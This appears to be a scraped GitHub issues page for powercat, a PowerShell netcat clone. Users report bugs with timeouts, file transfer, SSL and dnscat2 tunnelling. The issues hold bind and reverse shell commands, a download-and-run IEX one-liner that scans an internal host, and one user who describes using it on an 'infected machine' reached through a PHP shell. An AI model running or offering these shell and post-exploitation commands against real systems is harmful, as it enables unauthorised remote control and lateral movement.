besimorhino / powercat Goto Github PK
View Code? Open in Web Editor NEWnetshell features all in version 2 powershell
License: Apache License 2.0
netshell features all in version 2 powershell
License: Apache License 2.0
I'm doing an important basic test because this is the most useful use case for me. It's final use will be NAT bypass or NAT passthrough, whatever you like to call it :). Following tests have been performed on a basic LAN.
On Workstation A (Windows 7), I'm starting a client:
powercat -c 192.168.100.22 -p 8000 -r tcp:localhost:3389 -rep
Expected behavior: client must keep trying to connect to listener over and over again. At this point, a listener has not been started. So...
On Windows workstation B (Windows 8.1), at an arbitrary moment, I'm starting a listener:
Powercat -l -p 8000 -r tcp:3389
Goal here is that when I boot workstation B and start the listener, the client will connect successfully within 60 seconds. 60 seconds being the default timeout.
-t Timeout option. Default: 60 [int32]
-rep Repeater. Restart after disconnecting. [Switch]
I think the behavior of -rep might be different from what I expect. If so, is it possible to include this behavior as a feature?
many thanks,
Jeroen
I Use the powershell command for downloading powercat, It says script contains malicious content
Maybe I'm missing something, but there appears to be no way to detect connection errors - no exception/error is thrown/written, and $?
evaluates to True
in the following situations:
Question, I was at the bsideslv powercat talk. You were talking about a SSL enabled version that was just having issues with the server side stuff. I'd love to see about helping out with that, is there any chance you could put what you've worked on in a branch or something?
I'm trying a powercat with a -t 2 for a two second timeout and seeing 2 minutes. Actually I see two minute timeout regardless of what I set -t
PS C:\Users\tfulmer> date;powercat -c 10.10.37.111 -p 22 -t 2;date
Thursday, February 23, 2017 3:22:40 PM
SSH-2.0-OpenSSH_7.1
Thursday, February 23, 2017 3:24:40 PM
When trying to install PowerCat directly using invoke-expression (IEX), I get the following error in Powershell 7:
Invoke-Expression: This script contains malicious content and has been blocked by your antivirus software.
I'm on Windows 10 with built-in Windows Defender.
Was curious if there was bug transferring files, our lab was a windows 7 client(pshell 2.0) going to server 2012(pshell 4) we couldn't get it to transfer files; all other features worked great, got them talking, shells opened, but following the exact instructions(main page) we couldn't get the files to transfer.
Appreciate any suggestions, and great work on a super cool tool!!
We got ncat working in the same scenario but would really like to have the ability to use powercat as well.
for example
powershell.exe -E 'xx.ps1'
error : tells me it is not base64
i know it is probably utf-16 format issues, but i want to know how to fix it thanks
Perhaps I'm misunderstanding how to use this utility, but basically I'm looking for socat like functionality, where I open a listener and it persists, listening for incoming data on the specified port. in socat it would be: socat TCP-LISTEN:6142,fork stdout
, which in powercat I would think would be powercat -l -p 6142
however, using this from a PS prompt, the socket is closed as I cannot telnet into it. How do you use this script so that it'll persist?
I am tying to connect to a dnscat2 server. I use the --security open setting, I assume that is correct, because I see no way to add a psk with powercat(yet!).
But im not getting a session. Any help on how to set this up would be great!
got a little farther. I set a dns domain on powercat and dnscat2 and it seems to connect.
I can enter a session now from dnscat back through but I have not commands or shell access.
When trying to connect like so, all goes ok: telnet localhost 443
Then I type the letter d and immediately, I get an error:
[code]
PS H:> dIEX : The term 'd' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:172 char:61
try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExec
~~~~~~~~~~~~~~~~~~
PS H:>
Installed PS version:
PS H:> $PSVersionTable.PSVersion
Major Minor Build Revision
3 0 -1 -1
Either this is a bug, or I'm doing somthing wrong:)
Some recommendations in style and functionality
The community and MS are working on a Style Guide and Best Practices guide https://github.com/PoshCode/PowerShellPracticeAndStyle I know I made the recommendations to the original author but since I see it is being maintained by others now I thought I would repeat them :)
The bind shell powercat -l -p 4444 -e cmd.exe
does not return a prompt until I press Up Arrow
in the prompt running powercat.
This may be due to latency involved with an OpenVPN/rdesktop set-up, but this latency would likely be involved in operational use. I did not attempt to recreate locally to see if latency was a factor.
Replication:
In PowerShell:
powercat -v -l -p 4444 -e cmd.exe
The prompt will report: Listening on [0.0.0.0] (port 443)
On connecting device:
nc -nv 123.123.123.123 4444
After connecting, the connecting device displays:
(UNKNOWN) [123.123.123.123] 4444 (?) open
The bind device does not display the connection in the prompt, but the connection is visible in netstat.
In PowerShell Prompt:
<press up arrow>
The prompt will report Connection from [123.123.123.123] port [tcp] accepted (source port 5555)
and proceed as normal.
Hi,
I'm using Powercat to achieve a remote shell and after this, execute a port scan over other machines that the infected machine have visibilization.
I'm executing the port scaning of Powercat from memory using the folowing command:
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); (21,22,80,443) | % {powercat -c 172.16.11.33 -p $_ -t 1 -Verbose}
When I execute it, the remote shell disconnected and the result appear on the navigator which is used to infect the machine via PHP shell.
Why does it happen? How can I fix it?
Thanks!
If you open 2 copies of powercat pointing at each other, they sit there chewing through tons and tons of CPU, just bouncing around checking to see if there is anything to read. On my laptop, each copy pulls 10% of the CPU, and causes the fan to spin up. Not exactly "stealthy". It'd be a bit of rewrite, but it looks like everything is already using AsyncResult stuff, if it built a list of all the AsyncResults, it could do a WaitOne on that list, and then recheck everything and loop. Wouldn't be as clean as a callback based method, but it would be much much cleaner then currently.
Hi,
I setup a listener, "nc -l -p 443", then attempted to connect using Powercat. The following commands works successfully, "powercat -c 192.168.1.181 -p 443 -e cmd" however, using PowerShell mode, "powercat -c 192.168.1.181 -p 443 -ep" the connection is unsuccessful and causes both sides of the connection to exit (even nc on Kali crashes).
Enabling verbose output, the following is captured:
PS C:> Import-Module D:\GIT\Kieran-GitHub\powercat\powercat.ps1
PS C:> powercat -c 192.168.1.181 -p 443 -ep -Verbose
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Powershell
VERBOSE: Setting up Stream 1... (ESC/CTRL to exit)
VERBOSE: Connecting...
VERBOSE: Connection to 192.168.1.181:443 [tcp] succeeeded!
VERBOSE: Setting up Stream 2... (ESC/CTRL to exit)
VERBOSE: Stream 2 Setup Failure
VERBOSE: Closing Stream 1...
PS C:>
I spent a few hours looking through the code, adding some additional debug outputs etc. I also reviewed your change log from the past few commits.
The cause for Steam 2 setup to fail is that $Encoding has not been defined. It appears that the line
$Encoding = New-Object System.Text.AsciiEncoding
has been removed during some of the code re-factoring. This should be reintroduced as follows:
param($Stream1SetupVars)
try
{
$Encoding = New-Object System.Text.AsciiEncoding
[byte[]]$InputToWrite = @()
if($i -ne $null)
I have also made an additional update to my fork, changing the way that the $CommandToExecute variable is executed by Invoke-Expression (IEX). The code in question is:
##### Stream2 Read #####
$Prompt = $null
$ReturnedData = $null
if($CommandToExecute -ne "")
{
try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
catch{}
$Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
}
Previously only default output was captured and sent back to the listener, this created two side effects.
Firstly, any information displayed via the write-error, write-verbose, write-debug or write-warning CMDLets will not get send from the client back to the listener machine. This can be easily aciveved by implementing redirection of 3> 4> and 5> (along with 2>) to stream 1.
Secondly, if you didn't correctly type the command you wanted to run, no output was received. If you typed a CMDLet incorrectly, say resolve-dns instead of resolve-dnsname, you would receive no feedback. This can be easily resolved by setting the returned bytes to be that of the $error variable, this can be achieved by updating the catch portion (which is currently empty).
The updated code block would be
##### Stream2 Read #####
$Prompt = $null
$ReturnedData = $null
if($CommandToExecute -ne "")
{
try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 3>&1 4>&1 5>&1 | Out-String))}
catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
$Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
}
I will generate a pull request for you to merge these fixes and updates in, I have tagged the fixes as https://github.com/kjacobsen/powercat/tree/Powercat-EPIssue
Would it also be OK if I spent some time cleaning up this code standardizing this towards PowerShell best practices? I would really like to help putting in additional comments, error handling and more standardization.
Hi,
Can you document explicitly under which license you are distributed your code?
(without explicit mention, all rights are reserved)
You could add a LICENSE file or add a explicit mention in the README.md
Thanks
Please add a LICENSE
with your copyright notice
, I am interested in using your software for testing. It will become handy because there is no simple UDP listener that ships with Microsoft Windows (R). We always have to write one to test UDP connectivity. Almost all *nix operating systems come with OpenBSD-netcat
or netcat-traditional
. Thank you very much.
I get the following error if I pipe a message to powercat
> 'aaaaa' | powercat -c localhost -p 5514 -u
IEX : You cannot call a method on a null-valued expression.
At \\psf\home\Projects\powercat\powercat.ps1:932 char:18
+ $Output += IEX $InvokeString
+ ~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [Invoke-Expression], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull,Microsoft.PowerShell.Commands.InvokeExpressionCommand
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.